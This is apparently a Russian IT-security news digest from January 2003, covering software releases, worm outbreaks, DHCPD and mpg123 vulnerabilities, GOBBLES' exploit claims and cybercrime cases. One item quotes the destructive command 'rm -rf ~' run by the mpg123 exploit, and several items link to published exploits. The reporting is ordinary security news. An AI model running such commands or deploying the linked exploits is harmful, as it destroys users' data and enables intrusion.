На сайте компании Panda Software выложена краткая заметка о cookie. Cookie – это текстовый файл, который высылается пользователям при посещении ими веб-страниц. В Интернет-сообществе о них ходит множество слухов и сплетен, и многие пользователи опасаются этих небольших текстовых файлов – говорят, что вездесущие cookies могут содержать в себе вирусы или воровать с вашего компьютера информацию. Так ли это на самом деле? Собственно, сама заметка вкратце и рассказывает об этих таинственных cookie, однако уж очень кратко. Можно порекомендовать подобную заметку просто в качестве быстрого "ликбеза". Заметка - http://www.viruslab.ru/press/index.php?go=show&num=102 Однако! Для более продвинутых интересующихся людей, мы выложили более серьезные заметки по поводу кукиесов, которые лежат здесь: http://www.uinc.ru/articles/zametki/cookies.txt
18/01/2003 16:25 Перевод Linux Newbie Administrator Guide.
На сайте linuxshop.ru выложен перевод Linux Newbie Administrator Guide - одного из самых полных руководств по Линукс. Несмотря на названия "Руководство начинающего пользователя Linux", несомненно, будет представлять интерес для многих пользователей ОС Linux. Руководство - http://linuxshop.ru/linuxbegin/lnag-ru/
18/01/2003 15:40 Transmeta вводит защиту в конструкцию процессора.
Производитель процессоров поможет владельцам ноутбуков надежнее защитить свои персональные данные от воров, встроив в семейство чипов Crusoe средства защиты конфиденциальной информации. 14 января Transmeta объявила о том, что она впервые вводит в свои микропроцессоры ряд функций защиты, включая механизм шифрования и возможность хранить цифровые сертификаты и ключи. Добавление функций защиты в чип TM5800 позволит производителям ноутбуков создавать машины, которые надежнее оберегают от воров пароли и другие данные владельцев. Transmeta предполагает, что новые функции защиты данных будут применяться главным образом в тех ноутбуках, с которыми работают в беспроводных сетях. Таким способом Transmeta хочет добиться преимущества перед своим главным конкурентом Intel. Встроив средства шифрования в чип, она по существу предлагает их пользователям бесплатно. Чтобы ввести такие средства в компьютеры на платформе Intel, компании обычно используют отдельные микросхемы или специальное ПО (хотя программные средства шифрования легче взломать, чем аппаратные). Сегодня Intel встраивает функции защиты в свои чипсеты, но не в процессоры. Источник - http://zdnet.com.com/2100-1103-980521.html
18/01/2003 15:13 Власти США хотят внедрять передачу данных по электрическим проводам.
Власти США внимательно исследуют имеющиеся технологии передачи данных по электрическим проводам и всерьез рассматривают их как альтернативу высоскоростному доступу в интернет посредством DSL-подключения или сетей кабельного телевидения. Для государства новый вид услуг доступа в интернет будет означать снижение цен и большую доступность интернета для населения, а также возможность использовать эти каналы связи в качестве резервных при стихийных бедствиях, катастрофах или террористических актах. В Федеральной комиссии по связи США (FCC) считают, что на сегодняшний день основные технологические трудности преодолены, и поскольку никаких законодательных ограничений для таких систем не существует, путь на рынок широкополосного доступа им открыт. Однако нерешенным остается вопрос, кто первым возьмется за такой проект и откроет дорогу остальным. Источник - http://www.compulenta.ru
18/01/2003 14:47 Конференция "Индустрия безопасности России в 2003 году"
3 февраля 2003 года в Центре международной торговли в рамках VIII Международного форума "Технологии безопасности 2003" состоится Вторая Всероссийская конференция: "Индустрия безопасности России в 2003 году. Перспективы, тенденции, проблемы. Роль и место негосударственных организаций безопасности в общегосударственных антитеррористических мероприятиях". Конференция проводится при поддержке Комитета по безопасности Государственной Думы Федерального Собрания Российской Федерации, при участии федеральных органов власти и управления. Решения конференции, по мнению ее организаторов, станут важным аргументом в поддержку необходимости дальнейшего развития и совершенствования негосударственной системы безопасности в России. По вопросу участия в конференции необходимо обращаться в оргкомитет. Контактные лица: Кожемяков Александр Семенович и Скоробогатова Анна Александровна (тел./факс +7-095-795-0838, факс +7-095-911-1041 , oskord4@online.ru. Подробнее - http://www.tbforum.ru/print.php?id=46&funky=print
18/01/2003 14:04 ''Лаборатория Касперского'' подвела итоги 2002 года.
В пятницу "Лаборатория Касперского" обнародовала ежегодный обзор вирусной активности за 2002 год. В прошедшем году было зафиксировано 12 крупных и 34 менее значительных новых вирусных эпидемий. В общей сложности каждые 6 из 10 зарегистрированных в прошлом году случаев заражения были вызваны интернет-червем "Klez". Основным способом распространения вирусных программ в 2002 году осталась электронная почта (96,4 процента всех случаев заражения). Подробности - http://www.kaspersky.ru/news.html?id=1189502
17/01/2003 23:28 Повторный дефейс сайта журнала "Программист".
Сегодня одному из посетителей форума журнала "Программист" окончательно надоело смотреть на надпись "VietNam Hacker" и форум был восстановлен без участия веб-мастера сайта. (Небольшие изменения в оформление форума все же были внесены - добавлена эмблема ФСБ). Причиной уязвимости стала ошибка создателя phpBB в имени переменной в коде форума. За те три недели, пока сайт был лишен своего изначального содержания владельцы не сделали ничего для его восстановления. Титульная страница сайта до сих пор не приведена в исходный вид. Два дефейса без восстановления контента между ними - такое встретишь не часто. Форум - http://www.programme.ru/forum/index.php
17/01/2003 16:06 Выход FreeBSD 5.0 RC3.
13 января на сайте BSDTODAY был опубликован аннонс выхода третьего релиз-кандидата версии 5.0 ОС FreeBSD. Об этом сообщил один из разработчиков Скотт Лонг. На зеркалах доступны версии ОС для платформ i386, pc98, alpha, ia64, и sparc64. Выражется благодарность Marcel Moolenaar за работу с платформой ia64, Takahashi Yoshihiro - платформа pc98 и David Obrien - платформа sparc64. Заявляется о форсировании работ по выпуску финальной версии. Подробности - ftp://ftp.freebsd.org/pub/FreeBSD/releases/i386/5.0-RC3/RELNOTES.HTM
17/01/2003 15:39 Статья "Patching OpenBSD".
На сайте onlamp.com (сайт сети О'Рэйли) опубликована статья Jacek Artymiak о технологии применения патчей, касающихся безопасности в ОС OpenBSD версии 3.2. В ней описывается технология получения информации о вновь вышедших патчах, источники в Интернете, с которых можно получить (скачать) эти патчи, а также способы установки патчей в систему. Ссылка - http://www.onlamp.com/pub/a/bsd/2003/01/16/ssn_openbsd.html
17/01/2003 15:04 Выход Linux 2.5.59.
Что-то Линус зачастил в последнее время с выпуском девелоперских версий ядра Linux. Вчера было объявлено о выпуске очередной версии - 2.5.59. Обновления для платформ - Sparc, PowerPC, а также изменения в кодах XFS, AGP, kbuild, arm. Изменения - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.59
17/01/2003 13:24 IBM и AMD присоединяются к UnitedLinux.
Компании IBM и AMD приняли решение присоединиться к консорциуму UnitedLinux, объединяющему разработчиков операционной Linux-системы для корпоративного сектора. В консорциуме IBM и AMD получили статус "Технологических партнеров", который предоставляет им возможность участвовать в работе технической комиссии и предлагать собственные решения, получать доступ к еще не вышедшему ПО на ранних стадиях его разработки, а также вести совместные с консорциумом маркетинговые и рекламные компании. Финансовое участие IBM и AMD в проекте будет значительным, но меньшим по объему, чем у компаний-членов. В то же время, AMD и IBM не смогут продавать продукты UnitedLinux через своих реселлеров или OEM-партнеров. "Это и есть одно из основных отличий между партнерством и членством в консорциуме", - говорит в интервью сайту Internetnews Пола Хантер, главный менеджер UnitedLinux. В ближайшее время UnitedLinux намерен объявить имена нескольких компаний, которые также получат статус партнеров консорциума. Подробности - http://www.internetnews.com
17/01/2003 13:04 Статья "GSM: История стандарта"
На сайте mobile-review опубликована статья Сергея Сенина, в которой автор попытался описать историю появления стандарта сотовой связи GSM, а также причины, которые привели к появлению этого стандарта. Статья - http://mobile-review.com/standard/gsm-history.shtml
17/01/2003 11:52 Статья "Sylpheed - бесплатная замена TheBat для желающих".
На сайте "Софтерры" опубликована интересная статья Фёдора Сорекса, посвящённая обзору продукта Sylpheed - почтовой программе, работающей под Linux, OpenBSD, FreeBSD, Solaris и многими другими свободными и ограниченно-свободными системами. По многим своим функциональным возможностям эта программа не уступает, а по некоторым даже превосходит прекрасный и широкораспространённый почтовый клиент TheBat. Cтатья - http://www.softerra.ru/freeos/23274/
17/01/2003 11:33 Программы для защиты информации.
На сайте opennet.ru собрана довольно неплохая подборка ссылок на программы, имеющие отношение к защите информации, включая темы: криптография, PGP, обнаружение атак, патчи для улучшения безопасности, проверка безопасности системы. Ну, и, естественно, хотелось бы также заметить, что на нашем FTP-сервере содержится довольно неплохой архив подобных программ как для ОС Windows, так и для ОС UNIX. Ссылка - http://www.opennet.ru/links/info/1125.shtml
17/01/2003 11:05 Переполнение буфера в ISC DHCPD minires библиотеке.
Internet Software Consortium (ISC) обнаружил несколько уязвимостей переполнения буфера в ISC DHCPD. Уязвимость позволяет удаленным атакующим выполнять произвольный код с привилегиями DHCPD сервера. ISC провел внутреннюю проверку программы на соответствие спецификации RFC 2131. В результате проверки обнаружено несколько уязвимостей при обработки ошибок minires библиотекой, которая используется программой NSUPDATE для преобразования имени хоста в IP адрес. Переполнение происходит в стеке и может использоваться для выполнения произвольного кода. Уязвимость обнаружена в ISC DHCPD 3.0pl2 и 3.0.1RC11 Подробность - http://www.securitylab.ru/?ID=35411
17/01/2003 10:33 США: на пути к "Большому Брату".
Как утверждается в новом отчете Американского союза гражданских свобод (ACLU), с развитием высоких технологий и ужесточением мер безопасности после атак 11 сентября США превращаются в сообщество тотальной слежки в стиле "Большого Брата". Как утверждается в представленном ACLU 15 января отчете, соединение молниеносно внедряемых технологических нововведений и разрушение защиты неприкосновенности частной жизни грозят приблизить перспективу образования в США тоталитарного строя с тотальной слежкой, описанного Джорджем Оруэллом в романе "1984". Отчет предупреждает о разрастании "следящего монстра": как частный, так и государственный сектор наблюдает за жителями США через глазок видеокамер, так что по улицам крупнейших городов невозможно пройти, не попав на пленку. Сейчас, фактически, не существует правил, предписывающих, как можно использовать отснятые таким образом видеокассеты. В отчете упоминается о пилотном проекте Пентагона под названием Total Information Awareness ("Полное владение информацией"), где в одной базе данных объединена медицинская, финансовая, налоговая и другая информация о каждом американце - сведения о банковских операциях, медицинские записи, сообщения электронной почты, билеты на транспорт, телефонные переговоры. По словам руководителей ACLU, есть несколько законов в защиту неприкосновенности частной жизни, которые запрещают компаниям продавать правительству такого рода информацию. Источник - http://www.cnews.ru
17/01/2003 10:08 MandrakeSoft объявила о банкротстве.
Парижская компания MandrakeSoft, производитель известного пакета Mandrake Linux, вчера объявила о подаче "declaration de cessation des paiements" - французского аналога U.S. Chapter 11, заявления о защите банкротов от преследования со стороны кредиторов. Это позволит перенести дальнейшие переговоры с кредиторами о судьбе компании в стены суда. В заявлении, размещенном на сайте MandrakeSoft говорится о том, что после реорганизации и ликвидации задолженностей, в чем компании намерены помочь ее партнеры, она продолжит дальнейшую работу. На время переговоров с кредиторами MandrakeSoft и подготовки плана ликвидации задолженностей, управление компанией переходит к назначенному судом администратору. Тем временем, к апрелю 2003 года компания готовит выпуск следующей версии своего основного продукта, Mandrake Linux Version 9.1. Подробности - http://www.mandrakesoft.com/company/press/briefs?n=/mandrakesoft/news/2405
16/01/2003 15:23 Во всей России отделы "К" борются с киберпреступниками.
Согласно информации "Известий", в настоящее время по всей России функционируют так называемые отделы "К" - бывшие отделы по борьбе с преступлениями в сфере высоких технологий, раньше называемые отделами "Р". Они сейчас сформированы во всех 89 субъектах РФ. Однако в процентном соотношении, число сотрудников правоохранительных органов, которые борются с киберпреступлениями, составляет менее 1% от общего числа российских милиционеров. Основная масса преступлений в сфере компьютерных и информационных технологий совершается в Москве и Санкт-Петербурге. Однако в провинции их число также велико. Почти половина всех раскрываемых в России отделами "К" киберпреступлений относится к сфере телекоммуникационных технологий. В первую очередь, это несанкционированный доступ к программам спутникового телевидения путем распространения эмуляторов карточек доступа. В категорию наименее раскрываемых преступлений входит кража паролей для доступа в Интернет. Как правило, найти преступников представляется довольно сложным, так как в милицию обращается менее 5% пострадавших. Источник - http://www.izvestia.ru/internet/article28767
16/01/2003 14:09 Выход Linux 2.5.58.
14 января Линус Торвальдс объявил о выходе очередной версии девелоперского ядра Linux - на этот раз 2.5.58. Как пишет в сопроводительной записке сам Линус, столь частый выпуск последних релизов ядра вызван появлением большого чила мелких патчей, а также тем, что он на 2 недели уезжает в отпуск с семьёй. Сам Линус, как говорится в письме является сторонником более частых выходов новых версий ядра, собирающих мелкие патчи. Полный Changelog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.58
16/01/2003 13:58 Trend Micro представила новую стратегию борьбы с вирусами нового поколения.
Как сообщает InformationWeek, фирма Trend Micro Inc. представила во вторник новую концепцию, основная цель которой - предотвражение поражения серверов и корпоративных сетей новым поколением вирусов, которые могли бы появиться. Представленная фирмой программа звучит как Enterprise Protection Strategy. Продукты и сервисы, разрабатываемые компанией в рамках этой программы призваны обеспечить защиту защищаемых корпораций на многих сетевых уровнях и точчках доступа к сети. При этом, как заявляют представители фирмы, защита от вирусов будет осуществляться не на принципах анализа сигнатур вирусов и червей, а на интеллектуальном анализе сетевого траффика. Подробнее - http://www.informationweek.com/story/IWK20030114S0006
16/01/2003 13:40 Выход очередного номера журнала Crypto-Gram.
Bruce Schneier из Counterpane Internet Security, Inc. сообщает о выходе 15 января очередного номера Интернет-журнала Crypto-Gram. Журнал выпускается ежемесячно и посвящён анализу, оценкам и решениям, посвящённым проблемам компьютерной безопасности и криптографии. В текущем выпуске представлены статьи - Militaries and Cyber-War, Crypto-Gram Reprints, The Doghouse: Yahoo, News, Counterpane News, Security Notes from All Over: Cichlids, The RMAC Authentication Mode. В конце номера опубликованы комментарии читателей журнала. Журнал доступен - http://www.counterpane.com/crypto-gram-0301.html
16/01/2003 13:03 Найден способ установки в смартфон Orange SPV дополнительных программ.
С появлением на рынке все большего числа смартфонов, нередко приходится слышать о методах их взлома или обхода заложенных производителем или оператором связи ограничений. На днях сайт The Register сообщил о способе установки дополнительных программ в смартфон Orange SPV - первый в Европе мобильный телефон на базе Windows. Как оказалось, легче всего установке несертифицированного ПО поддается французская версия смартфона. Чтобы отключить проверку сертификации приложений, нужно произвести лишь "жесткую" перезагрузку аппарата с потерей всех пользовательских данных и выполнить пару несложных манипуляций. В результате, сотрутся настройки, заложенные в телефон оператором, исчезнут и ограничения на загрузку приложений. Простота процедуры, по-видимому, обусловлена некоторыми недоработками прошивки аппарата и, скорее всего, будет устранена в ближайшем будущем. С британской версией аппарата такой фокус не проходит, и для обхода ограничений нужно самостоятельно модифицировать настройки телефона. И хотя инструкции по взлому имеются на многих сетевых форумах, желающим отключить проверку сертификации приложений следует быть начеку. Последствия самостоятельного переконфигурирования аппарата могут быть самыми неожиданными, поэтому в любом случае стоит сделать резервную копию всех данных из его памяти и соблюдать осторожность. Само собой разумеется, никакой сервисный центр не согласится бесплатно ремонтировать аппарат после проведения на нем подобных "экспериментов". Источник - http://www.compulenta.ru
16/01/2003 12:34 Червь Sobig устанавливает программу Backdoor.
Обнаружен новый вирус-червь Sobig, который скачивает и устанавливает Backdoor-программу на компьютере пользователя. Sobig представляет собой приложение Windows (PE EXE-файл), имеет размер около 64Kб (упакован TeLock)и написан на языке Microsoft Visual C++. Червь активизируется только если пользователь сам запускает зараженные файл (при двойном щелчке на вложении). Затем червь инсталлирует себя в систему и запускает процедуры своего распространения. При инсталляции червь копирует себя с именем WINMGM32.EXE в каталог Windows и регистрирует этот файл в ключе авто-запуска системного реестра. При рассылке зараженных писем червь Sobig использует прямое подключение к SMTP-серверу ищет файлы *.WAB, *.DBX, *.HTM, *.HTML, *.EML, *.TXT, сканирует их и выделяет строки, являющиеся электронными адресами. Для рассылки по сети червь перебирает сетевые ресурсы и копирует себя в один из каталогов с именем WINMGM32.EXE. Sobig скачивает из интернет текстовый файл в котором содержится ссылка на выполняемый PE-файл. Червь скачивает этот PE-файл в каталог Windows с именем DWN.DAT и запускает его. Источник - http://www.viruslist.ru
16/01/2003 12:10 Уязвимости в ОС для мобильника.
На сайте securitylab.ru выложена довольно любопытная заметка Виталия Дрозда об уязвимостях, обнаруженных в ОС, поставляемой для новых смартофонов. Не успели умолкнуть аплодисменты по поводу разработки мегакорпорацией Microsoft операционной системы для смартфонов, то бишь интеллектуальных мобильных телефонов, как появились новости об обнаружении все тех же "дыр" в системе безопасности, которыми могут воспользоваться вездесущие хакеры. Единственным провайдером, который принял на вооружение операционную систему Microsoft Smartphone 2002 и оснащает ей продаваемые смартфоны, оказался европейский Orange. Наверное, его администрация уже жалеет о принятом решении. Совместная комиссия Microsoft и Orange уже "приступила к внимательному изучению проблемы". Две бреши в системе безопасности операционной системы были обнаружены неизвестными энтузиастами, которые немедленно выложили информацию в сеть, и теперь всем заинтересованным сторонам придется поторопиться, пока злоумышленники не наломали дров, а это лишь вопрос времени. В качестве первоочередной "припарки" провайдер рекомендует владельцам смартфонов скачивать только то программное обеспечение, которое рекомендовано самой Orange. Источник - http://www.SecurityLab.ru/?ID=35400
16/01/2003 11:36 Появление нового "троянца" под Linux.
Антивирусная компания Symantec сообщает о появлении нового "троянца" для ОС Linux под названием Trojan.Linux.JBellz. Код червя может содержаться в специально сформированном .mp3-файле. Будучи запущен в среде Linux при помощи плеера mpg123 (называется версия pre0.59s) запускается на выполнение шелл-код, который в результате рекурсивно удаляет все файлы в домашней директории пользователя ( 'rm -rf ~' ). Стабильная версия плеера (0.59r) лишена уязвимости. Уязвимость обнаружена в дистрибутивах Suse 8.0, Slackware 8.0. Собственно говоря, то, что господа из Symantec назвали трояном представляет собой эксплоит mpg123-плеера, опубликованный на днях группой GOBBLES Security под названием как раз jinglebellz.c. Кроме того, хотелось бы заметить, что сам факт якобы имеющего места глобального заражения всех(!) пиринговых сетей тоже вызывает большие сомнения (мы писали об этом послании GOBBLES во вчерашних новостях). Также хотелось бы заметить, что в списке рассылки BUGTRAQ наш соотечественник ZARAZA (http://www.security.nnov.ru) указывает ребятам из GOBBLES, что сам эксплоит является типичным переполнением стека, вызываемым в плеере mpg123 при вычислении максимального размера фрейма. Со своей стороны ZARAZA также предлагает изменения, которык необходимо включить в исходный код плеера. Подробности - http://securityresponse.symantec.com/avcenter/venc/data/trojan.linux.jbellz.html
16/01/2003 09:40 МВД хочет покрыть убийц Сухомлина?
В уголовном деле Владимира Сухомлина начали появляться детали, явно свидетельствующие о желании отечественной милиции, по возможности, "отмазать" бандитов в погонах. Как пишет сегодня интернет-издание "Утро.ру", стали известны подробности расследования уголовного дела, в котором с каждым днем растет число неясностей. Так, по информации издания, во время похищения у здания "Киноплекса" на Ленинском проспекте 23-летний Владимир Сухомлин смог позвонить по "02" и сообщить оператору, что его похищают. К Сухомлину подошли сотрудники милиции и потребовали документы. Их у Володи не оказалось, и он предложил милиционерам пройти к своему автомобилю. Но вместо этого его повели к другой машине. Офицеры МВД России похищали человека на глазах множества людей! В этот момент Володя пытался вести диалог с оператором "02", интересовавшейся, почему милиционеры насильно уводят его в машину. Преступники отобрали у Владимира телефон и отключили его. Оператор попыталась позвонить на мобильный Сухомлина, а затем... забыла об этом инциденте. Впоследствии сотрудники ФСБ, принимавшие участие в розыске и поимке убийц, говорили, что трагической развязки удалось бы избежать, если бы им вовремя стало известно о похищении. Но, к сожалению, случилось самое страшное. Более подробно - http://www.cnews.ru/topnews/2003/01/15/content4.shtml
15/01/2003 14:26 Microsoft открывает исходный код Windows.
14 января корпорация Microsoft объявила о начале реализации новой инициативы по открытию доступа к исходному коду операционных систем семейства Windows. Программа государственной безопасности (Government Security Program - GSP) позволяет правительственным организациям из различных стран мира получить доступ к исходному коду наиболее современных ОС Microsoft: Windows 2000, Windows CE, Windows XP и еще не вышедшей Windows Server 2003. В рамках программы Microsoft будет предоставлять и подробные технические консультации по использованию своих продуктов. Свой новый шаг Microsoft объясняет тем, что у правительственных организаций, особенно силовых ведомств, особые требования к безопасности компьютерных систем. Для построения по-настоящему защищенной информационной инфраструктуры им требуется учитывать все особенности используемых операционных систем, что сложно сделать, не имея доступа к их исходному коду. Таким образом, по уровню открытости для государственных структур операционные системы Microsoft вплотную приблизились к конкурирующим решениям из сферы open-source. Участие в GSP бесплатно и дает государственным организациям право просмотра исходного кода Windows Первой страной, начавшей сотрудничество с Microsoft по программе GSP, стала Россия. Соответствующее соглашение с софтверным гигантом уже подписал НТЦ "Атлас", представляющий интересы Федерального агентства правительственной связи и информации Российской Федерации (ФАПСИ). Кроме этого, доступ к коду Windows получили и структуры военно-политического блока НАТО. Пресс - релиз - http://www.microsoft.com/presspass/press/2003/jan03/01-14GSPrelease.asp
15/01/2003 14:19 Статья "Компьютерная стеганография - защита информации или инструмент преступления?"
На сайте www.crime-research.org опубликована статья Владимира Голубева под названием "Компьютерная стеганография - защита информации или инструмент преступления?". Как следует из названия, посвящена она стеганографии - что, в переводе с греческого означает "тайнопись". В ней автором рассмотрены основные аспекты компьютерной стеганографии, а также сам процесс стеганографии. В самой статье также есть ссылки на стеганографические программы. Рекомендуем ознакомиться. Статья - http://www.crime-research.org/library/Steganos.htm
15/01/2003 13:42 Бесплатная утилита для борьбы с червем Avron.
На сайте "Лаборатории Касперского" выложена бесплатная утилита, предназначенная для удаления Интернет-червя I-Worm.Avron. Желающие могут её свободно скачать. Утилита - ftp://ftp.kaspersky.ru/utils/clrav.com
15/01/2003 13:17 Борьба сторонников и противников закона DMCA. Продолжение следует.
Представители музыкальной и технологической индустрии, которые постоянно страдают от незаконного распространения своей продукции в Интернете, сделали заявление о взаимном соглашении по вопросу защиты своих авторских прав. за короткое время вполне очевидным стало то, что многие статьи "закона о защите авторских прав в цифровую эпоху" - DMCA несколько устарели и не могут быть применены в полной мере. В настоящее время в Конгрессе США обсуждается возможность внесения двух важных поправок в закон об авторских правах. Предлагаемые изменения в законодательстве поддерживают Intel, Verizon, Philips Electronics North America Corp., Sun Microsystems, Gateway, а также Consumer Electronics Association, Computer and Communications Industry Association, Association for Computing Machinery, Computer Research Association и еще ряд ассоциаций. Со своей стороны, ведущие торговые ассоциации технологической и музыкальной индустрии решили защищать себя сами, не дожидаясь правительственных законов и решений Конгресса. Компании Microsoft, IBM, Intel , Dell и др. лоббируют в Конгрессе свои интересы, которые прямо противоположны предложенным поправкам. По мнению участников соглашения, принятый в 1998 году закон DMCA давал четкое понятие того, как пользователь может распоряжаться с цифровымыми аудио- и видео файлами. Напомним, что этот закон запрещал делать копии каких-либо цифровых материалов, независимо от того, для чего эти копии предназначены. Источник - http://www.viruslist.ru
15/01/2003 12:53 Удаленный эксплоит для mpg123.
Несколько месяцев назад RIAA наняла экспертов из GOBBLES Security, чтобы они изобрели и создали антипиратский инструмент - гибрид резидентного вируса и "червя". В результате исследования самых популярных Media проигрывателей, был создан инструмент, позволяющий внедрять троян в следующие MP3 проигрыватели, при попытке проиграть злонамеренный MP3 файл: mplayer (www.mplayerhq.org), WinAMP (www.winamp.com), Windows Media Player (www.microsoft.com), xine (xine.sourceforge.net), mpg123 (www.mpg123.de), xmms (www.xmms.org). GOBBLES Security опубликовала эксплоит, который способен заражать системы, с установленным mpg123 плеером. Информация об уязвимостях в других продуктах будет опубликована позже. Уязвимость обнаружена в mpg123 (pre0.59s). Подробности и эксплоит - http://www.SecurityLab.ru/?ID=35351
15/01/2003 12:34 RIAA запустило червя в p2p сети.
Хакерская группа Gobbles Security объявила о создании программы, которая позволит Ассоциации звукозаписывающих компаний США (RIAA) производить аудит пиринговых сетей и впоследствии вовсе расправиться с файлообменными службами. Более того, участники группы Gobbles, по их утверждению, были напрямую наняты RIAA для создания подобного "антипиратского инструмента" - гибрида резидентного вируса и "червя". Остаётся только непонятным, что именно подвергается заражению - ранее это считалось невозможным) и распространяться по p2p-сетям. Gobbles утверждает, что, когда хост пиринговой сети оказывается заражённым, он собирает информацию о записях, пересылаемых по сети, и отправляет её в штаб-квартиру RIAA. Зараза же распространяется и на другие узлы сети. "Наша программа сработала даже лучше, чем мы предполагали, и сейчас, по нашим сведениям, приблизительно 95% компьютеров, участвующих в работе p2p-сетей, уже заражены средством, которое мы разработали для RIAA", - цитирует The Register заявление Gobbles. Пока никаких подтверждений самому факту существования подобного вируса нет. Подробнее - http://www.SecurityLab.ru/?ID=35350
15/01/2003 11:51 Google борется с судебными исками компаний-паразитов.
В самом конце декабря 2002 г. компания Google обратилась в окружной суд западной Оклахомы с требованием отказаться от рассмотрения иска, поданного против Google компанией Search King в октябре прошлого года. Search King специализируется на специфическом виде деятельности - повышении рейтингов сайтов своих заказчиков в поисковых системах. Для этого компания создала собственную сеть сайтов, на страницах которых размещаются ссылки на сайт клиента и на ресурсы внутри сети Search King. В этой сети существуют настоящие виртуальные "порталы" со множеством страниц, ссылающихся на страницы других столь же виртуальных "порталов". Таким образом, сайты внутри Search King получают весьма высокий рейтинг PageRank, использующийся для сортировки результатов поисковой системой Google. Напомним, что система PageRank основана на учете количества ссылок на данную страницу с других сайтов. При этом вес ссылки со страницы с высоким PageRank больше, чем у страницы с низким показателем. В итоге, ссылки из сети Search King могли способствовать заметному росту рейтингов сайтов клиентов компании и, как следствие, росту их посещаемости и привлекательности для рекламодателей. Search King обвиняет Google в причинении материального ущерба путем намеренного изменения алгоритмов поиска и, по сути, девальвации рейтинга PageRank сайтов Search King. В иске утверждается, что Google владеет "рейтинговой системой, на которую полагается весь интернет", и изменения в этой системе могут серьезно сказываться на работе других компаний. По мнению Search King, изменения в поисковый алгоритм вносились с целью подорвать деятельность компании, являющейся конкурентом Google на рынке онлайновой рекламы. Подробности - http://www.compulenta.ru/2003/1/15/36783/
15/01/2003 10:18 Первая BIOS с поддержкой технологии обеспечения безопасности Palladium.
В начале января компания American Megatrends Inc. (AMI) представила первую в мире BIOS, поддерживающую спецификации TCPA 1.0. Эти спецификации были разработаны организацией Trusted Computing Platform Alliance (TCPA) для обеспечения компьютерной безопасности на аппаратном уровне. В TCPA входят многие крупные производители компьютерного оборудования, такие как IBM, Intel и Hewlett-Packard. Одним из инициаторов создания аппаратной системы защиты информации с кодовым названием Palladium выступила Microsoft. Подсистема TCPA состоит из двух основных компонентов. Аппаратный модуль Trusted Platform Module (TPM) представляет собой специальный чип, устанавливающийся на системной плате компьютера и содержащий информацию о системе. Второй компонент (именно он включен в новую версию AMIBIOS) представляет собой специальную микропрограмму, которая проверяет целостность вычислительной системы и подтверждает ее безопасность. Ключевая информация о компьютере защищается криптографическими методами и передается из TPM базовой системе ввода-вывода (BIOS), а затем операционной системе. При включении компьютера происходит следующее. Вначале загрузочный блок BIOS обращается к модулю TPM, чтобы удостовериться в подлинности самой BIOS. Далее базовая система ввода-вывода проверяет целостность загрузчика и ядра операционной системы. В конце концов, BIOS передает операционной системе специальные идентификаторы, подтверждающие целостность и безопасность всей платформы. Источник - http://www.ami.com/
14/01/2003 19:31 Десять самых распространенных и опасных уязвимостей в ПО.
Некоммерческая организация Open Web Application Security Project (OWASP) представила список десяти наиболее опасных, но, в то же время, распространенных дыр в программном обеспечении для интернета и веб-сервисах. По мнению OWASP, на эти уязвимости стоит обратить самое пристальное внимание как государственным, так и коммерческим организациям, желающим обезопасить себя и своих клиентов от хакеров. Все указанные уязвимости достаточно широко распространены, а использовать их под силу даже малоквалифицированным хакерам, поскольку соответствующие средства взлома легко найти в Сети. На первом месте списка OWASP находится уязвимость, связанная с отсутствием проверки параметров в http-запросах. В результате, используя особые параметры, хакер может получить доступ к ресурсам сервера через веб-приложение. На втором месте находится несоблюдение политик управления доступом к ресурсам. Это позволяет злоумышленнику использовать закрытые ресурсы или получать доступ к учетным записям других пользователей. На третьей позиции рейтинга значится несоблюдение правил управления учетными записями и пользовательскими сессиями. Эта уязвимость связана, прежде всего, с отсутствием надежной защиты пользовательских данных (логина, пароля) и идентификаторов сессий, таких как файлы cookie. Это позволяет хакерам перехватывать данные других пользователей и пользоваться системой от их имени. Подробности - http://www.compulenta.ru/2003/1/14/36784/
14/01/2003 18:28 В Ираке блокирован доступ к международным почтовым серверам.
Возможную войну в Ираке США, как и в случае с афганскими талибами, предваряет мощной пропагандистcкой акцией и психологической атакой. В городах и селах Ирака с самолётов сбрасываются листовки, направленные против режима Саддама Хуссейна. Интернет также используется в пропагандистских целях. Так, в связи с рассылкой американцами антиправительственного спама на иракские адреса электронной почты, руководство страны приняло решение о блокировании трафика всех иностранных SMTP-серверов. Вот содержание одного из сообщений, рассылаемых в Ирак: "Если вы предоставите информацию об оружии массового уничтожения или предпримете шаги по предотвращению его использования, мы сделаем всё необходимое для того, чтобы защитить вас и ваших близких. В противном случае вы сильно пожалеете о последствиях". По мнению экспертов, запрет Ирака на использование международных почтовых серверов только облегчит задачу американским пропагандистам - теперь все иракцы получают почту от одного провайдера. Источник - http://www.cnews.ru
14/01/2003 10:19 Патч, который не патчит....
Как говорит Tomasz Ostrowski патч для НТ за выпуском MS02-071 (Q328310) совсем не не патчит систему, а приводит к её презагрузке.... Дискуссии о патче - http://groups.google.com/groups?th=dba7c44ebd24239b
13/01/2003 11:48 Троих киберпреступников не освободили под залог.
Во вторник суд г.Карачи отказался освободить под залог троих людей, которых подозревают в использовании номеров украденных кредитных карточек для приобретения товаров в интерактивном режиме. Суд, который возглавляет судья Акрам Хуссейн Джаффри, отказался освободить под залог Хурама Ифтихара Сиддиги и Фаизала Квериши, директоров компьютерной компании "Фаст Трек", якобы созданной для совершения этого преступления, и Накки Аббаса, агента этой компании по клирингу. ФБР сообщило суду, что трое подозреваемых использовали кредитные карточки известных банков, действующих на территории Пакистана. Судья заявил, что они не могут быть освобождены под залог, поскольку совершённое ими преступление носит международный характер. ФБР предъявило обвинение в использовании номеров украденных кредитных карточек, выданных местными банками, в том числе "Стендад Чатед Банк" и "Ситибанк", с целью приобретения программного обеспечения и компьютерного оборудования в крупных торговых центрах, включая Intel, Gateway и Compaq. По оценкам "Стендад Чатед Банк", ущерб от банковских махинаций составил 1 млн рупий. ФБР конфисковало компьютерное оборудование на сумму 4 млн рупий, включая компьютерные процессоры и системные платы. Преступники были арестованы 20 декабря после того, как в ФБР начали поступать жалобы от таможенных властей США. По мнению ФБР, преступники приобретали программное обеспечение и компьютерное оборудование в интерактивном режиме, используя номера украденных кредитных карточек. Источник - http://www.crime-research.org
13/01/2003 11:30 Эксплоит isc dhcpd 3.0.
